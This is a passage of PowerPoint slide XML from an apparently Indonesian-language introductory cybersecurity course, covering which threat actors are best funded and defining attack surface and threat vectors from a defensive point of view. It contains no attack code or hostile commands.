            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tiga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Nation-state actors, Organized crime groups, Advanced Persistent Threat (APT) groups,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Nation-state = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, punya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Organized crime = punya dana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriminalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, APT groups = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didanai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Panjang.</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3541898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Permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Vektor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Lokasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/port, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dari </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pandang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Vektor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
